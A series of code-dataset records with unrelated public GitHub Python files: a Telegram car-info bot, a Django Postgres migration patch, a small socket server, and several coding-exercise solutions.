conn_service.retrieve_vehicles()\n\n if len(conn_service.vehicles) < 1:\n await update.message.reply_text(f'��е знайшов жодної автівки у твоєму гаражі 🤷‍♂️')\n else:\n await update.message.reply_text(f'Знайшов {len(connection.vehicles)} авто в твоєму гаражі \\n')\n\n context.user_data['connection'] = connection\n else:\n await update.message.reply_text(f'Упс, щось пішло не так :( Авторизація не успішна, спробуй знову.')\n return ConversationHandler.END\n\n context.user_data['cars'] = [vehicle_info_normalization(x) for x in connection.vehicles]\n context.user_data['selected_car'] = None\n reply_markup = build_car_selection_keyboard(context.user_data['cars'])\n await update.message.reply_text('Authorization successful. Please select a car:', reply_markup=reply_markup)\n\n return CAR_SELECTION\n\n\nasync def garage(update, context):\n # Clear the selected car and show the car selection menu again\n context.user_data['selected_car'] = None\n reply_markup = build_car_selection_keyboard(context.user_data['cars'])\n await update.message.reply_text('Please select a car:', reply_markup=reply_markup)\n return CAR_SELECTION\n\n\nasync def car_selection(update, context):\n query = update.callback_query\n selected_car = query.data\n context.user_data['selected_car'] = selected_car\n reply_markup = build_action_selection_keyboard()\n await query.answer()\n await query.message.reply_text(f'Обрано команду {query.data}')\n await query.message.reply_text(text='Please select an action:', reply_markup=reply_markup)\n return ACTION_SELECTION\n\n\nasync def action_selection(update, context):\n query = update.callback_query\n selected_action = query.data\n # Do something with the selected car and action here\n await query.edit_message_text(text=f\"You selected {selected_action} for {context.user_data['selected_car']}.\")\n # Rebuild the action selection keyboard and send it to the user again\n reply_markup = build_action_selection_keyboard()\n await query.message.reply_text('Please select another action:', reply_markup=reply_markup)\n return ACTION_SELECTION\n\n\n\ndef build_car_selection_keyboard(cars):\n keyboard = [[telegram.InlineKeyboardButton(car, callback_data=car)] for car in cars]\n return telegram.InlineKeyboardMarkup(keyboard)\n\n\n# def build_action_selection_keyboard():\n#\n# keyboard = [[telegram.InlineKeyboardButton('Базова інформація', callback_data='base_info')],\n# [telegram.InlineKeyboardButton('Швидкий звіт по стану авто', callback_data='gen_quick_report')],\n# [telegram.InlineKeyboardButton('Дані про поїздки', callback_data='trip_report')],\n# [telegram.InlineKeyboardButton('Сервісні акції', callback_data='service_promo')],\n# [telegram.InlineKeyboardButton('Запис на сервісне обслуговування', callback_data='service_maintenance')],\n# [telegram.InlineKeyboardButton('Стан вікон/дверей', callback_data='win_door_state')],\n# [telegram.InlineKeyboardButton('Запас палива', callback_data='fuel_level')],\n# [telegram.InlineKeyboardButton('Локація авто', callback_data='location')],\n# [telegram.InlineKeyboardButton('Віддалені вказівки', callback_data='remote_commands')]]\n#\n# return telegram.InlineKeyboardMarkup(keyboard)\n\n\ndef build_action_selection_keyboard():\n\n keyboard = [['Базова інформація', 'Швидкий звіт по стану авто', 'Дані про поїздки', 'Сервісні акції',\n 'Запис на сервісне обслуговування', 'Стан вікон/дверей', 'Запас палива', 'Локація авто', 'Віддалені вказівки']]\n return telegram.ReplyKeyboardMarkup(keyboard, resize_keyboard=True)\n\n\ndef handle_action_selection(message):\n # Retrieve the selected option from the message\n selected_option = message.text\n\n # Perform an action based on the selected option\n if selected_option == 'Базова інформація':\n reply_text = 'Тут буде повна інформація про авто'\n elif selected_option == 'Швидкий звіт по стану авто':\n reply_text = 'Тут буде швидкий звіт про стан авто'\n elif selected_option == 'Дані про поїздки':\n reply_text = 'Тут будуть дані про поїздки'\n elif selected_option == 'Сервісні акції':\n reply_text = 'Тут будуть сервісні акції'\n elif selected_option == 'Запис на сервісне обслуговування':\n reply_text = 'Тут буде запис на сервісне обслуговування'\n elif selected_option == 'Ста�� вікон/дверей':\n reply_text = 'Тут буде стан вікон/дверей'\n elif selected_option == 'Запас палива':\n reply_text = 'Тут буде запас палива'\n elif selected_option == 'Локація авто':\n reply_text = 'Тут буде локація авто'\n elif selected_option == 'Віддалені вказівки':\n reply_text = 'Тут будуть віддалені вказівки'\n else:\n reply_text = 'Невідома опція'\n\n return reply_text\n\n\nasync def handle_message(update, context):\n message = update.message\n reply_text = handle_action_selection(message)\n await message.reply_text(reply_text)\n\n\ndef get_authorization_url():\n url = f'https://oauth3.example.com/authorize?client_id={CLIENT_ID}&redirect_uri={REDIRECT_URI}'\n return url\n\n\ndef get_access_token(authorization_code):\n url = 'https://oauth3.example.com/token'\n payload = {\n 'grant_type': 'authorization_code',\n 'code': authorization_code,\n 'client_id': CLIENT_ID,\n 'client_secret': CLIENT_SECRET,\n 'redirect_uri': REDIRECT_URI\n }\n response = requests.post(url, data=payload)\n if response.ok:\n return response.json()['access_token']\n else:\n return None\n\n\ndef main():\n # Create an instance of the Updater class\n application = Application.builder().token(TOKEN).build()\n\n # Add conversation handler for handling the /start command\n conv_handler = ConversationHandler(\n entry_points=[CommandHandler('start', start)],\n states={\n EMAIL: [MessageHandler(filters.TEXT & ~filters.COMMAND, email)],\n PASSWD: [MessageHandler(filters.TEXT & ~filters.COMMAND, passwd)],\n CAR_SELECTION: [CallbackQueryHandler(car_selection)],\n ACTION_SELECTION: [CallbackQueryHandler(action_selection)]\n },\n fallbacks=[CommandHandler('garage', garage)],\n allow_reentry=True\n )\n application.add_handler(conv_handler)\n application.add_handler(telegram.ext.MessageHandler(filters.TEXT, handle_message))\n\n # Add message handler for handling OAuth3 authorization - future development\n # message_handler = MessageHandler(filters.Regex(r'^https://oauth3.example.com/.*$'), oauth3_callback)\n # application.add_handler(message_handler)\n\n application.run_polling()\n application.idle()\n\n\nif __name__ == '__main__':\n main()","repo_name":"obalenko/skodaconnect_bot","sub_path":"skodaconnect_bot/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10588,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42667810722","text":"#프로그래머스\n#스택,큐\n#기능개발\nimport math\ndef solution(progresses, speeds) :\n stack = []\n answer = []\n days = 0\n for i in range(len(progresses)) :\n days = math.ceil((100-progresses[i])/speeds[i])\n\n if i == 0 :\n stack.append(days)\n else : \n if stack[0] >= days :\n stack.append(days)\n else :\n answer.append(len(stack))\n stack.clear()\n stack.append(days)\n answer.append(len(stack))\n return answer\n","repo_name":"parkjeongmi/jamie_study","sub_path":"stack,queue/queue.03.py","file_name":"queue.03.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4216426178","text":"from contextlib import contextmanager\nfrom unittest import mock\n\nimport django\n\nfrom django.db.migrations import (\n AddField,\n AlterField,\n CreateModel,\n DeleteModel,\n RemoveField,\n RenameField,\n)\nfrom django.db.migrations.autodetector import MigrationAutodetector\nfrom django.db.migrations.operations.fields import FieldOperation\n\nfrom psqlextra.models import (\n PostgresMaterializedViewModel,\n PostgresPartitionedModel,\n PostgresViewModel,\n)\nfrom psqlextra.types import PostgresPartitioningMethod\n\nfrom . import operations\nfrom .state import (\n PostgresMaterializedViewModelState,\n PostgresPartitionedModelState,\n PostgresViewModelState,\n)\n\n# original `MigrationAutodetector.add_operation`\n# function, saved here so the patched version can\n# call the original\nadd_operation = MigrationAutodetector.add_operation\n\n\nclass AddOperationHandler:\n \"\"\"Handler for when operations are being added to a new migration.\n\n This is where we intercept operations such as\n :see:CreateModel to replace it with our own.\n \"\"\"\n\n def __init__(self, autodetector, app_label, args, kwargs):\n self.autodetector = autodetector\n self.app_label = app_label\n self.args = args\n self.kwargs = kwargs\n\n def add(self, operation):\n \"\"\"Adds the specified operation to the list of operations to execute in\n the migration.\"\"\"\n\n return add_operation(\n self.autodetector,\n self.app_label,\n operation,\n *self.args,\n **self.kwargs,\n )\n\n def add_field(self, operation: AddField):\n \"\"\"Adds the specified :see:AddField operation to the list of operations\n to execute in the migration.\"\"\"\n\n return self._transform_view_field_operations(operation)\n\n def remove_field(self, operation: RemoveField):\n \"\"\"Adds the specified :see:RemoveField operation to the list of\n operations to execute in the migration.\"\"\"\n\n return self._transform_view_field_operations(operation)\n\n def alter_field(self, operation: AlterField):\n \"\"\"Adds the specified :see:AlterField operation to the list of\n operations to execute in the migration.\"\"\"\n\n return self._transform_view_field_operations(operation)\n\n def rename_field(self, operation: RenameField):\n \"\"\"Adds the specified :see:RenameField operation to the list of\n operations to execute in the migration.\"\"\"\n\n return self._transform_view_field_operations(operation)\n\n def _transform_view_field_operations(self, operation: FieldOperation):\n \"\"\"Transforms operations on fields on a (materialized) view into state\n only operations.\n\n One cannot add/remove/delete fields on a (materialized) view,\n however, we do want Django's migration system to keep track of\n these kind of changes to the model. The :see:ApplyState\n operation just tells Django the operation was applied without\n actually applying it.\n \"\"\"\n\n if django.VERSION >= (4, 0):\n model_identifier = (self.app_label, operation.model_name.lower())\n model_state = (\n self.autodetector.to_state.models.get(model_identifier)\n or self.autodetector.from_state.models[model_identifier]\n )\n\n if isinstance(model_state, PostgresViewModelState):\n return self.add(\n operations.ApplyState(state_operation=operation)\n )\n else:\n model = self.autodetector.new_apps.get_model(\n self.app_label, operation.model_name\n )\n\n if issubclass(model, PostgresViewModel):\n return self.add(\n operations.ApplyState(state_operation=operation)\n )\n\n return self.add(operation)\n\n def add_create_model(self, operation: CreateModel):\n \"\"\"Adds the specified :see:CreateModel operation to the list of\n operations to execute in the migration.\"\"\"\n\n if django.VERSION >= (4, 0):\n model_state = self.autodetector.to_state.models[\n self.app_label, operation.name.lower()\n ]\n\n if isinstance(model_state, PostgresPartitionedModelState):\n return self.add_create_partitioned_model(operation)\n elif isinstance(model_state, PostgresMaterializedViewModelState):\n return self.add_create_materialized_view_model(operation)\n elif isinstance(model_state, PostgresViewModelState):\n return self.add_create_view_model(operation)\n else:\n model = self.autodetector.new_apps.get_model(\n self.app_label, operation.name\n )\n\n if issubclass(model, PostgresPartitionedModel):\n return self.add_create_partitioned_model(operation)\n elif issubclass(model, PostgresMaterializedViewModel):\n return self.add_create_materialized_view_model(operation)\n elif issubclass(model, PostgresViewModel):\n return self.add_create_view_model(operation)\n\n return self.add(operation)\n\n def add_delete_model(self, operation: DeleteModel):\n \"\"\"Adds the specified :see:Deletemodel operation to the list of\n operations to execute in the migration.\"\"\"\n\n if django.VERSION >= (4, 0):\n model_state = self.autodetector.from_state.models[\n self.app_label, operation.name.lower()\n ]\n\n if isinstance(model_state, PostgresPartitionedModelState):\n return self.add_delete_partitioned_model(operation)\n elif isinstance(model_state, PostgresMaterializedViewModelState):\n return self.add_delete_materialized_view_model(operation)\n elif isinstance(model_state, PostgresViewModelState):\n return self.add_delete_view_model(operation)\n else:\n model = self.autodetector.old_apps.get_model(\n self.app_label, operation.name\n )\n\n if issubclass(model, PostgresPartitionedModel):\n return self.add_delete_partitioned_model(operation)\n elif issubclass(model, PostgresMaterializedViewModel):\n return self.add_delete_materialized_view_model(operation)\n elif issubclass(model, PostgresViewModel):\n return self.add_delete_view_model(operation)\n\n return self.add(operation)\n\n def add_create_partitioned_model(self, operation: CreateModel):\n \"\"\"Adds a :see:PostgresCreatePartitionedModel operation to the list of\n operations to execute in the migration.\"\"\"\n\n if django.VERSION >= (4, 0):\n model_state = self.autodetector.to_state.models[\n self.app_label, operation.name.lower()\n ]\n partitioning_options = model_state.partitioning_options\n else:\n model = self.autodetector.new_apps.get_model(\n self.app_label, operation.name\n )\n partitioning_options = model._partitioning_meta.original_attrs\n\n _, args, kwargs = operation.deconstruct()\n\n if partitioning_options[\"method\"] != PostgresPartitioningMethod.HASH:\n self.add(\n operations.PostgresAddDefaultPartition(\n model_name=operation.name, name=\"default\"\n )\n )\n\n partitioned_kwargs = {\n **kwargs,\n \"partitioning_options\": partitioning_options,\n }\n\n self.add(\n operations.PostgresCreatePartitionedModel(\n *args,\n **partitioned_kwargs,\n )\n )\n\n def add_delete_partitioned_model(self, operation: DeleteModel):\n \"\"\"Adds a :see:PostgresDeletePartitionedModel operation to the list of\n operations to execute in the migration.\"\"\"\n\n _, args, kwargs = operation.deconstruct()\n return self.add(\n operations.PostgresDeletePartitionedModel(*args, **kwargs)\n )\n\n def add_create_view_model(self, operation: CreateModel):\n \"\"\"Adds a :see:PostgresCreateViewModel operation to the list of\n operations to execute in the migration.\"\"\"\n\n if django.VERSION >= (4, 0):\n model_state = self.autodetector.to_state.models[\n self.app_label, operation.name.lower()\n ]\n view_options = model_state.view_options\n else:\n model = self.autodetector.new_apps.get_model(\n self.app_label, operation.name\n )\n view_options = model._view_meta.original_attrs\n\n _, args, kwargs = operation.deconstruct()\n\n view_kwargs = {**kwargs, \"view_options\": view_options}\n\n self.add(operations.PostgresCreateViewModel(*args, **view_kwargs))\n\n def add_delete_view_model(self, operation: DeleteModel):\n \"\"\"Adds a :see:PostgresDeleteViewModel operation to the list of\n operations to execute in the migration.\"\"\"\n\n _, args, kwargs = operation.deconstruct()\n return self.add(operations.PostgresDeleteViewModel(*args, **kwargs))\n\n def add_create_materialized_view_model(self, operation: CreateModel):\n \"\"\"Adds a :see:PostgresCreateMaterializedViewModel operation to the\n list of operations to execute in the migration.\"\"\"\n\n if django.VERSION >= (4, 0):\n model_state = self.autodetector.to_state.models[\n self.app_label, operation.name.lower()\n ]\n view_options = model_state.view_options\n else:\n model = self.autodetector.new_apps.get_model(\n self.app_label, operation.name\n )\n view_options = model._view_meta.original_attrs\n\n _, args, kwargs = operation.deconstruct()\n\n view_kwargs = {**kwargs, \"view_options\": view_options}\n\n self.add(\n operations.PostgresCreateMaterializedViewModel(\n *args,\n **view_kwargs,\n )\n )\n\n def add_delete_materialized_view_model(self, operation: DeleteModel):\n \"\"\"Adds a :see:PostgresDeleteMaterializedViewModel operation to the\n list of operations to execute in the migration.\"\"\"\n\n _, args, kwargs = operation.deconstruct()\n return self.add(\n operations.PostgresDeleteMaterializedViewModel(*args, **kwargs)\n )\n\n\n@contextmanager\ndef patched_autodetector():\n \"\"\"Patches the standard Django :seee:MigrationAutodetector for the duration\n of the context.\n\n The patch intercepts the `add_operation` function to\n customize how new operations are added.\n\n We have to do this because there is no way in Django\n to extend the auto detector otherwise.\n \"\"\"\n\n autodetector_module_path = \"django.db.migrations.autodetector\"\n autodetector_class_path = (\n f\"{autodetector_module_path}.MigrationAutodetector\"\n )\n add_operation_path = f\"{autodetector_class_path}.add_operation\"\n\n def _patched(autodetector, app_label, operation, *args, **kwargs):\n handler = AddOperationHandler(autodetector, app_label, args, kwargs)\n\n if isinstance(operation, CreateModel):\n return handler.add_create_model(operation)\n\n if isinstance(operation, DeleteModel):\n return handler.add_delete_model(operation)\n\n if isinstance(operation, AddField):\n return handler.add_field(operation)\n\n if isinstance(operation, RemoveField):\n return handler.remove_field(operation)\n\n if isinstance(operation, AlterField):\n return handler.alter_field(operation)\n\n if isinstance(operation, RenameField):\n return handler.rename_field(operation)\n\n return handler.add(operation)\n\n with mock.patch(add_operation_path, new=_patched):\n yield\n","repo_name":"SectorLabs/django-postgres-extra","sub_path":"psqlextra/backend/migrations/patched_autodetector.py","file_name":"patched_autodetector.py","file_ext":"py","file_size_in_byte":11888,"program_lang":"python","lang":"en","doc_type":"code","stars":647,"dataset":"github-code","pt":"72"} +{"seq_id":"17457698312","text":"'''\nPopping and deleting from dictionaries\n\nOften, you will want to remove keys and value from a dictionary. You can do so using the del Python instruction. It's important to remember that del will throw a KeyError if the key you are trying to delete does not exist. You can not use it with the .get() method to safely delete items; however, it can be used with try: catch:.\n\nIf you want to save that deleted data into another variable for further processing, the .pop() dictionary method will do just that. You can supply a default value for .pop() much like you did for .get() to safely deal with missing keys. It's also typical to use .pop() instead of del since it is a safe method.\n\nHere, you'll remove 2011 and 2015 to save them for later, and then delete 2012 from the dictionary.\n'''\n\nbaby_names = {}\n\nwith open('../datasets/baby_names.csv') as f:\n # Skipping header\n _ = f.readline()\n\n # Iterating over lines\n for row in f:\n year, sex, _, name, count, rank = row.strip().split(',')\n\n year = int(year)\n rank = int(rank)\n\n if sex == 'MALE' and year > 2011:\n # Empty dictionary for 2012\n if year in baby_names and year != 2012:\n baby_names[year][rank] = name\n else:\n baby_names[year] = {}\n\n# Sorting dictionary year by year\nfor y in baby_names:\n baby_names[y] = dict(sorted(baby_names[y].items()))\n\n'''\nINSTRUCTIONS\n\n* Iterate over baby_names[2014], unpacking it into rank and name.\n* Print each rank and name.\n* Repeat the process for baby_names[2012].\n'''\n\n# Iterate over the 2014 nested dictionary\nfor rank, name in baby_names[2014].items():\n # Print rank and name\n print(rank, name)\n \n# Iterate over the 2012 nested dictionary\nfor rank, name in baby_names[2012].items():\n # Print rank and name\n print(rank, name)\n ","repo_name":"sashakrasnov/datacamp","sub_path":"24-data-types-for-data-science/2-dictionaries--the-root-of-python/06-working-with-dictionaries-more-pythonically.py","file_name":"06-working-with-dictionaries-more-pythonically.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"4601139312","text":"import socket\nimport time\n\n# create a socket object\ns = socket.socket()\nprint (\"socket successfully created\")\n\n# specify a port\nport = 4888\n\n# bind to the port, \n# empty string is to allow listening from any computer\ns.bind(('', port))\nprint (\"socket binded to %s\" %(port))\n\n# put the socket into listening mode\ns.listen(5)\nprint (\"socket is listening\")\n\n# loop while listening for connections \nwhile True:\n\n\t# Establish connection with client.\n\tc, addr = s.accept()\n\tprint ('Got connection from', addr)\n\n\t#send a think you message to the client.\n\t# need to use 'b' to sent message as bytes\n\tc.send(b'Thank you for connecting')\n\n\ttime.sleep(60)\n\n\t# Close the connection with the client\n\tc.close()","repo_name":"conyerbd/FIS_Exercises","sub_path":"NetSockMon/Python/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73285128553","text":"# ICE Revision: $Id$\n\"\"\"\nClass that implements common functionality for selecting timesteps\n\"\"\"\n\nfrom optparse import OptionGroup\n\nfrom PyFoam.ThirdParty.six import print_\n\nclass CommonSelectTimesteps(object):\n \"\"\"\n This class compiles a list of timesteps that should be processed\n \"\"\"\n def __init__(self):\n pass\n\n def addOptions(self,defaultUnique,singleTime=False):\n \"\"\"Add the necessary options\n :param defaultUnique: whether timesteps are unique by default\n :param singleTime: only a single timestep may be selected\"\"\"\n\n self.singleTime=singleTime\n\n time=OptionGroup(self.parser,\n \"Time Specification\",\n \"Which times should be processed\")\n time.add_option(\"--time\",\n type=\"float\",\n dest=\"time\",\n default=[],\n action=\"append\",\n help=\"Timestep that should be processed.\"+\"\" if singleTime else \"Can be used more than once\")\n time.add_option(\"--latest-time\",\n dest=\"latest\",\n action=\"store_true\",\n default=False,\n help=\"Use the latest time\")\n if not self.singleTime:\n time.add_option(\"--all-times\",\n dest=\"all\",\n action=\"store_true\",\n default=False,\n help=\"Process all times\")\n time.add_option(\"--after-time\",\n type=\"float\",\n dest=\"afterTime\",\n action=\"store\",\n default=None,\n help=\"Process all after this time\")\n time.add_option(\"--before-time\",\n type=\"float\",\n dest=\"beforeTime\",\n action=\"store\",\n default=None,\n help=\"Process all before this time\")\n\n if defaultUnique:\n time.add_option(\"--duplicate-times\",\n dest=\"unique\",\n action=\"store_false\",\n default=True,\n help=\"Allow using a time-directory onlymore than once\")\n else:\n time.add_option(\"--unique-times\",\n dest=\"unique\",\n action=\"store_true\",\n default=False,\n help=\"Use each time-directory only once\")\n\n time.add_option(\"--show-times\",\n dest=\"showTimes\",\n action=\"store_true\",\n default=False,\n help=\"Show the times in the case and the times that will be used\")\n\n time.add_option(\"--parallel-times\",\n dest=\"parallelTimes\",\n action=\"store_true\",\n default=False,\n help=\"Use the information from 'processor0' to determine the available times\")\n\n self.parser.add_option_group(time)\n\n def processTimestepOptions(self,\n sol):\n \"\"\"Process the options\n :param sol: the solution-directory that is to be worked with\"\"\"\n\n if self.opts.parallelTimes:\n sol.setToParallel()\n\n if self.opts.latest:\n self.opts.time.append(float(sol.getLast()))\n if self.singleTime:\n if len(self.opts.time)>1:\n self.error(\"Only a single time allow. We got\",len(self.opts.time),\" : \",\n \", \".join(self.opts.time))\n else:\n if self.opts.all:\n for t in sol.getTimes():\n self.opts.time.append(float(t))\n if self.opts.beforeTime or self.opts.afterTime:\n start=float(sol.getFirst())\n end=float(sol.getLast())\n if self.opts.beforeTime:\n end=self.opts.beforeTime\n if self.opts.afterTime:\n start=self.opts.afterTime\n for t in sol.getTimes():\n tVal=float(t)\n if tVal>=start and tVal<=end:\n self.opts.time.append(tVal)\n\n self.opts.time.sort()\n\n times=[]\n\n for s in self.opts.time:\n times.append(sol.timeName(s,minTime=True))\n\n if self.opts.unique:\n tmp=[]\n last=None\n cnt=0\n for s in times:\n if last!=s:\n tmp.append(s)\n else:\n cnt+=1\n last=s\n if cnt>0:\n self.warning(\"Removed\",cnt,\"duplicate times\")\n times=tmp\n\n if len(times)==0:\n self.warning(\"No valid times specified\")\n\n if self.opts.showTimes:\n print_(\"Times in case:\",sol.getTimes())\n print_(\"Used times:\",times)\n\n return times\n def processTimestepOptionsIndex(self,sol):\n \"\"\"Process the time options and return a list of (time,index) tuples\"\"\"\n times=self.processTimestepOptions(sol)\n\n return [(t,sol.timeIndex(t,True)) for t in times]\n\n# Should work with Python3 and Python2\n","repo_name":"nextfoam/baram","sub_path":"PyFoam/Applications/CommonSelectTimesteps.py","file_name":"CommonSelectTimesteps.py","file_ext":"py","file_size_in_byte":5405,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"72"} +{"seq_id":"38329064176","text":"import sys\nIS_TEST_DATA = False\nif IS_TEST_DATA == True:\n datas = '[2.2 1]'\nelse:\n datas = sys.stdin.readline()\nif datas is not None and len(datas) > 2:\n datas = datas[1:len(datas) - 1]\n nums = datas.split()\n for i in range(len(nums)):\n if '.' not in nums[i]:\n nums[i] = int(nums[i])\n else:\n nums[i] = float(nums[i])\n snums = list(sorted(list(set(nums))))\n for snum in snums:\n print(snum, end=' ')\n\n\n\n","repo_name":"Peefy/PythonsWithVSCode","sub_path":"src/nowcoder/nowcoder2.py","file_name":"nowcoder2.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"36246234748","text":"import pytest\nimport pandas as pd\nimport logging\nimport os\nimport mlflow\nimport numpy as np\n\nlogging.basicConfig(level=logging.INFO, format=\"%(asctime)-15s %(message)s\")\nlogger = logging.getLogger()\n\n@pytest.fixture(scope='session')\ndef model():\n\n gbc_model_local_path = os.path.join(\"src/train_gradient_boosting/models\", \"gradient_boosting_dir\")\n lb_model_local_path = os.path.join(\"src/train_gradient_boosting/models\", \"label_binarizer_dir\")\n\n return gbc_model_local_path, lb_model_local_path\n\ndef test_export_model(model):\n \"\"\"\n Checks if the model exported\n \"\"\"\n gbc_model_local_path, lb_model_local_path = model\n assert gbc_model_local_path\n assert lb_model_local_path\n\n try:\n sk_pipe = mlflow.sklearn.load_model(gbc_model_local_path)\n lb = mlflow.sklearn.load_model(lb_model_local_path)\n except mlflow.exceptions.MlflowException as err:\n logger.info(\"Could not find an sk_pipe configuration file at model path\")\n raise err\n\ndef test_label_binarizer(model):\n \"\"\"\n Test label binarizer\n \"\"\"\n _, lb_model_local_path = model\n lb = mlflow.sklearn.load_model(lb_model_local_path)\n values = [\"<=50K\", \">50K\"]\n v = lb.transform(values)\n assert (v == [[0], [1]]).all()\n\ndef test_inference_less(model):\n \"\"\"\n Test inference \n \"\"\"\n\n gbc_model_local_path, lb_model_local_path = model\n logger.info(\"Loading model and performing inference\")\n logger.info(gbc_model_local_path)\n sk_pipe = mlflow.sklearn.load_model(gbc_model_local_path)\n lb = mlflow.sklearn.load_model(lb_model_local_path)\n\n array = np.array([[\n 39,\n \"State-gov\",\n 77516,\n \"Bachelors\",\n 13,\n \"Never-married\",\n \"Adm-clerical\",\n \"Not-in-family\",\n \"White\",\n \"Male\",\n 0,\n 2174,\n 40,\n \"United-States\"]])\n\n df_temp = pd.DataFrame(data=array, columns=[\n \"age\",\n \"workclass\",\n \"fnlwgt\",\n \"education\",\n \"education-num\",\n \"marital-status\",\n \"occupation\",\n \"relationship\",\n \"race\",\n \"sex\",\n \"capital-gain\",\n \"capital-loss\",\n \"hours-per-week\",\n \"native-country\",\n ])\n\n pred = sk_pipe.predict(df_temp)\n y = lb.inverse_transform(pred)[0]\n\n assert y == \"<=50K\"\n\n\ndef test_inference_greater(model):\n \"\"\"\n Test inference \n \"\"\"\n\n gbc_model_local_path, lb_model_local_path = model\n logger.info(\"Loading model and performing inference\")\n logger.info(gbc_model_local_path)\n sk_pipe = mlflow.sklearn.load_model(gbc_model_local_path)\n lb = mlflow.sklearn.load_model(lb_model_local_path)\n\n array = np.array([[\n 31,\n \"Private\",\n 45781,\n \"Masters\",\n 14,\n \"Never-married\",\n \"Prof-specialty\",\n \"Not-in-family\",\n \"White\",\n \"Female\",\n 14084,\n 0,\n 50,\n \"United-States\"\n ]])\n\n df_temp = pd.DataFrame(data=array, columns=[\n \"age\",\n \"workclass\",\n \"fnlwgt\",\n \"education\",\n \"education-num\",\n \"marital-status\",\n \"occupation\",\n \"relationship\",\n \"race\",\n \"sex\",\n \"capital-gain\",\n \"capital-loss\",\n \"hours-per-week\",\n \"native-country\",\n ])\n\n pred = sk_pipe.predict(df_temp)\n y = lb.inverse_transform(pred)[0]\n\n assert y == \">50K\"","repo_name":"milon101/Deploying-a-Machine-Learning-Model-on-Heroku-with-FastAPI","sub_path":"src/model_check/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":3414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23252219335","text":"# -*- coding: utf-8 -*-\n\n################################################\n#\n# URL:\n# =====\n# https://leetcode.com/problems/unique-paths-ii/\n#\n# DESC:\n# =====\n# A robot is located at the top-left corner of a m x n grid (marked 'Start' in the diagram below).\n#\n# The robot can only move either down or right at any point in time.\n# The robot is trying to reach the bottom-right corner of the grid (marked 'Finish' in the diagram below).\n#\n# Now consider if some obstacles are added to the grids. How many unique paths would there be?\n#\n#\n#\n# An obstacle and empty space is marked as 1 and 0 respectively in the grid.\n#\n# Note: m and n will be at most 100.\n#\n# Example 1:\n# Input:\n# [\n# [0,0,0],\n# [0,1,0],\n# [0,0,0]\n# ]\n# Output: 2\n# Explanation:\n# There is one obstacle in the middle of the 3x3 grid above.\n# There are two ways to reach the bottom-right corner:\n# 1. Right -> Right -> Down -> Down\n# 2. Down -> Down -> Right -> Right\n#\n################################################\nfrom typing import List\n\n\nclass Solution:\n def uniquePathsWithObstacles(self, obstacleGrid: List[List[int]]) -> int:\n m = len(obstacleGrid)\n if m == 0:\n return 0\n n = len(obstacleGrid[0])\n if n == 0:\n return 0\n\n obstacleGrid[0][0] = 1 - obstacleGrid[0][0]\n for i in range(1, m):\n obstacleGrid[i][0] = obstacleGrid[i - 1][0] * (1 - obstacleGrid[i][0]) # set it to 0 if the previous one is 0\n for i in range(1, n):\n obstacleGrid[0][i] = obstacleGrid[0][i - 1] * (1 - obstacleGrid[0][i])\n\n for i in range(1, m):\n for j in range(1, n):\n if obstacleGrid[i][j] == 1:\n obstacleGrid[i][j] = 0\n else:\n obstacleGrid[i][j] = obstacleGrid[i - 1][j] + obstacleGrid[i][j - 1]\n\n return obstacleGrid[-1][-1]\n","repo_name":"huajianmao/pyleet","sub_path":"solutions/a0063uniquepathsii.py","file_name":"a0063uniquepathsii.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"17965734590","text":"#!/usr/bin/python3\n\"\"\"defining paskal triangle function\"\"\"\n\n\ndef pascal_triangle(n):\n \"\"\"The function checks whether n is less than or equal to zero,\n and returns an empty list if it is.\"\"\"\n\n if n <= 0:\n return []\n\n triangle = [[1]]\n for i in range(1, n):\n row = [1]\n for j in range(1, i):\n prev_row = triangle[i - 1]\n row.append(prev_row[j - 1] + prev_row[j])\n row.append(1)\n triangle.append(row)\n\n return triangle\n","repo_name":"Abelmafi/alx-interview","sub_path":"0x00-pascal_triangle/0-pascal_triangle.py","file_name":"0-pascal_triangle.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5717499974","text":"#!/usr/bin/env python3\n\"\"\" create the results schema in the CDM DB \"\"\"\nimport logging\n\nfrom ..config import GlueConfig\nfrom ..db.multidb import MultiDB\nfrom ..db.utils import ensure_schema\nfrom ..webapi import WebAPIClient\n\nlogger = logging.getLogger(__name__)\n\n# resources:\n# https://github.com/OHDSI/WebAPI/wiki/CDM-Configuration#results-schema-tables\n# https://github.com/OHDSI/WebAPI/blob/v2.13.0/src/main/java/org/ohdsi/webapi/service/DDLService.java#L136\n\n\ndef run(config: GlueConfig, api: WebAPIClient):\n \"\"\"create the results schema in the CDM DB\"\"\"\n logger.info(\"connecting to CDM database\")\n with MultiDB(*config.cdm_db_params()) as cdm_db:\n logger.info(\"starting\")\n # ensure the results schema exists\n # creating it here will not enable our next steps, but it\n # may be helpful if the other tools aren't creating it\n ensure_schema(cdm_db, config.results_schema)\n\n # see if the results.cohort table exists, if so init has already happened\n canary_table = \"cohort\"\n if canary_table in cdm_db.list_tables(config.results_schema):\n logger.info(\n \"found canary table (%s), init has already happened\", canary_table\n )\n return\n ddl = api.get_results_ddl()\n logger.info(\"got %s-byte sql blob from webapi. Executing...\", len(ddl))\n cdm_db.execute(ddl)\n logger.info(\"done\")\n","repo_name":"edencehealth/ohdsi-glue","sub_path":"src/glue/operations/init_results_schema.py","file_name":"init_results_schema.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 